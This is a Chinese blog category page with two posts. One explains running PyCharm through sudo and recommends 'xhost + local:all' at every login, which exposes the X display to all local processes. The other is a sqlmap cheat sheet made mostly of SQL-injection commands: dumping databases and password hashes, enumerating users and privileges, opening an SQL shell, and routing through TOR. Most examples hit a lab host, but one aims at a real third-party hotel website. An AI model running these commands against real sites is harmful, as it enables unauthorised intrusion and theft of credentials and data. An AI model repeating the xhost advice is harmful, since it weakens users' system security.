Python – 第3页 – 夜行人

我普通用户打开PyCharm，编辑root的代码，提示无法保存
当我
sudo /usr/local/pycharm/bin/pycharm.sh
—
提示找不到
Can’t connect to X11 window server using ‘:0’ as the value of the DISPLAY variable.

解决办法，通过2步操作解决这个问题

1、第一步
X11 Server权限问题

通过以下命令运行本地所有程序访问X11

xhost + local:all

执行后，如果提示
non-network local connections being added to access control list
则表示成功，为了方便，你可以把这命令加到~/.bashrc里，启动就加载

2、第二步
环境变量问题
X11的连接，依赖环境变量DISPLAY

env |grep DISPLAY
可以看到输出是
DISPLAY=:0

但sudo的时候，并没有设置这个环境变量

sudo env |grep DISPLAY

是没有输出的

为了设置这个环境变量，我们有2个解决办法

a、修改/usr/local/pycharm/bin/pycharm.sh

在脚本开头加入
export DISPLAY=:0

b、修改sudo配置

sudo /usr/sbin/visudo

找到Defaults env_keep

在最后加入DISPLAY

mickey整理
来源：影子

更新
svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev

sqlmap.py -u “http://www.islamichina.com/hotelinchina.asp?cityid=2&m=1” -v 1 –sql-shell //执行SQL语句

sqlmap.py -u “http://www.islamichina.com/hotelinchina.asp?cityid=2&m=1” -v 5 //更详细的信息

load options from a configuration INI file
sqlmap -c sqlmap.conf

使用POST方法提交
sqlmap.py -u “http://192.168.1.121/sqlmap/oracle/post_int.php” –method POST –data “id=1”

使用COOKIES方式提交,cookie的值用;分割,可以使用TamperData来抓cookies
python sqlmap.py -u “http://192.168.1.121/sqlmap/mssql/cookie_int.php” –cookie “id=1” -v 1

使用referer欺骗
python sqlmap.py -u “http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1” –referer “http://www.google.com” -v 3

使用自定义user-agent,或者使用随机使用自带的user-agents.txt
python sqlmap.py -u “http://192.168.1.121/sqlmap/oracle/get_int.php?id=1” –user-agent “Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)” -v 3

python sqlmap.py -u “http://192.168.1.121/sqlmap/mysql/get_int.php?id=1” -v 1 -a “./txt/user-agents.txt”

使用基本认证
python sqlmap.py -u “http://192.168.1.121/sqlmap/mysql/basic/get_int.php?id=1” –auth-type Basic –auth-cred “testuser:testpass” -v 3

使用Digest认证
python sqlmap.py -u “http://192.168.1.121/sqlmap/mysql/digest/get_int.php?id=1” –auth-type Digest –auth-cred “testuser:testpass” -v 3

使用代理,配合TOR
python sqlmap.py -u “http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1” –proxy “http://192.168.1.47:3128”
python sqlmap.py -u “http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1” –proxy “http://192.168.1.47:8118”

使用多线程猜解
python sqlmap.py -u “http://192.168.1.121/sqlmap/mysql/get_int.php?id=1” -v 1 –current-user –threads 3

绕过动态检测,直接指定有注入点的参数,可以使用,分割多个参数,指定user-agent注入
python sqlmap.py -u “http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1” -v 1 -p “id
python sqlmap.py -u “http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1&cat=2” -v 1 -p “cat,id”
python sqlmap.py -u “http://192.168.1.121/sqlmap/mysql/ua_str.php” -v 1 -p “user-agent” –user-agent “sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)”

指定数据库,绕过SQLMAP的自动检测
python sqlmap.py -u “http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1” -v 2 –dbms “PostgreSQL”

* MySQL
* Oracle
* PostgreSQL
* Microsoft SQL Server

指定操作系统,绕过SQLMAP自动检测
python sqlmap.py -u “http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1” -v 2 –os “Windows”

* Linux
* Windows

自定义payload
Options: –prefix and –postfix

In some circumstances the vulnerable parameter is exploitable only if the user provides a postfix to be appended to the injection payload. Another scenario where these options come handy presents itself when the user already knows that query syntax and want to detect and exploit the SQL injection by directly providing a injection payload prefix and/or postfix.

Example on a MySQL 5.0.67 target on a page where the SQL query is: $query = “SELECT * FROM users WHERE id=(‘” . $_GET[‘id’] . “‘) LIMIT 0, 1”;:

$ python sqlmap.py -u “http://192.168.1.121/sqlmap/mysql/get_str_brackets.php?id=1” -v 3 -p “id” –prefix “‘” –postfix “AND ‘test’=’test”

[…]
[hh:mm:16] [INFO] testing sql injection on GET parameter ‘id’ with 0 parenthesis
[hh:mm:16] [INFO] testing custom injection on GET parameter ‘id’
[hh:mm:16] [TRAFFIC OUT] HTTP request:
GET /sqlmap/mysql/get_str_brackets.php?id=1%27%29%20AND%207433=7433%20AND%20
%28%27test%27=%27test HTTP/1.1
Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
Host: 192.168.1.121:80
Accept-language: en-us,en;q=0.5
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,
image/png,*/*;q=0.5
User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)
Connection: close
[…]
[hh:mm:17] [INFO] GET parameter ‘id’ is custom injectable
[…]

As you can see, the injection payload for testing for custom injection is:

id=1%27%29%20AND%207433=7433%20AND%20%28%27test%27=%27test

which URL decoded is:

id=1′) AND 7433=7433 AND (‘test’=’test

and makes the query syntatically correct to the page query:

SELECT * FROM users WHERE id=(‘1’) AND 7433=7433 AND (‘test’=’test’) LIMIT 0, 1

In this simple example, sqlmap could detect the SQL injection and exploit it without need to provide a custom injection payload, but sometimes in the real world application it is necessary to provide it.

页面比较
python sqlmap.py -u “http://192.168.1.121/sqlmap/mysql/get_int_refresh.php?id=1” –string “luther” -v 1
python sqlmap.py -u “http://192.168.1.121/sqlmap/mysql/get_int_refresh.php?id=1” –regexp “<td>lu[\w][\w]er” -v

排除网站的内容
python sqlmap.py -u “http://192.168.1.121/sqlmap/mysql/get_int_refresh.php?id=1” –excl-reg “Dynamic content: ([\d]+)”

多语句测试，php内嵌函数mysql_query(),不支持多语句
python sqlmap.py -u “http://192.168.1.121/sqlmap/mysql/get_int.php?id=1” –stacked-test -v 1

union注入测试
python sqlmap.py -u “http://192.168.1.121/sqlmap/oracle/get_int.php?id=1” –union-test -v 1

unionz注入配合orderby
python sqlmap.py -u “http://192.168.1.121/sqlmap/pgsql/get_str.php?id=1” –union-test –union-tech orderby -v 1

python sqlmap.py -u “http://192.168.1.121/sqlmap/mssql/get_int.php?id=1” -v 1 –union-use –banner
python sqlmap.py -u “http://192.168.1.121/sqlmap/mysql/get_int.php?id=1” -v 5 –union-use –current-user
python sqlmap.py -u “http://192.168.1.121/sqlmap/mysql/get_int_partialunion.php?id=1” -v 1 –union-use –dbs

fingerprint
python sqlmap.py -u “http://192.168.1.121/sqlmap/mssql/get_int.php?id=1” -v 1 -f
python sqlmap.py -u “http://192.168.123.36/sqlmap/get_str.asp?name=luther” -v 1 -f -b

判断当前用户是否是dba
python sqlmap.py -u “http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1” –is-dba -v 1

列举数据库用户
python sqlmap.py -u “http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1” –users -v 0

列举数据库用户密码
python sqlmap.py -u “http://192.168.1.121/sqlmap/mysql/get_int.php?id=1” –passwords -v 0
python sqlmap.py -u “http://192.168.1.121/sqlmap/mssql/get_int.php?id=1” –passwords -U sa -v 0

查看用户权限
python sqlmap.py -u “http://192.168.1.121/sqlmap/oracle/get_int.php?id=1” –privileges -v 0
python sqlmap.py -u “http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1” –privileges -U postgres -v 0

列数据库
python sqlmap.py -u “http://192.168.1.121/sqlmap/mssql/get_int.php?id=1” –dbs -v 0

列出指定数据库指定表的列名
python sqlmap.py -u “http://192.168.1.121/sqlmap/mysql/get_int.php?id=1” –columns -T users -D test -v 1

列出指定数据库的指定表的指定列的内容
python sqlmap.py -u “http://192.168.1.121/sqlmap/mssql/get_int.php?id=1” –dump -T users -D master -C surname -v 0

指定列的范围从2－4
python sqlmap.py -u “http://192.168.1.121/sqlmap/mysql/get_int.php?id=1” –dump -T users -D test –start 2 –stop 4 -v 0

导出所有数据库，所有表的内容
python sqlmap.py -u “http://192.168.1.121/sqlmap/mysql/get_int.php?id=1” –dump-all -v 0

只列出用户自己新建的数据库和表的内容
python sqlmap.py -u “http://192.168.1.121/sqlmap/mssql/get_int.php?id=1” –dump-all –exclude-sysdbs -v 0

sql query
python sqlmap.py -u “http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1” –sql-query “SELECT usename FROM pg_user” -v 0
python sqlmap.py -u “http://192.168.1.121/sqlmap/mysql/get_int.php?id=1” –sql-query “SELECT host, password FROM mysql.user LIMIT 1, 3” -v 1

SELECT usename, passwd FROM pg_shadow ORDER BY usename

保存和恢复会话
python sqlmap.py -u “http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1” -b -v 1 -s “sqlmap.log”

保存选项到INC配置文件
python sqlmap.py -u “http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1” -b -v 1 –save

文章属于类别 Python

通过sudo运行PyCharm

[zz]Pelican – 用Python写的类Octopress工具

Django应用的几种发布方式

Python中如何支持PUT/DELETE/PATCH等HTTP方法

sqlmap简单中文说明

Search

文章归档

分类目录

链接表

功能

一	二	三	四	五	六	日
« 5月
		1	2	3	4	5
6	7	8	9	10	11	12
13	14	15	16	17	18	19
20	21	22	23	24	25	26
27	28	29	30	31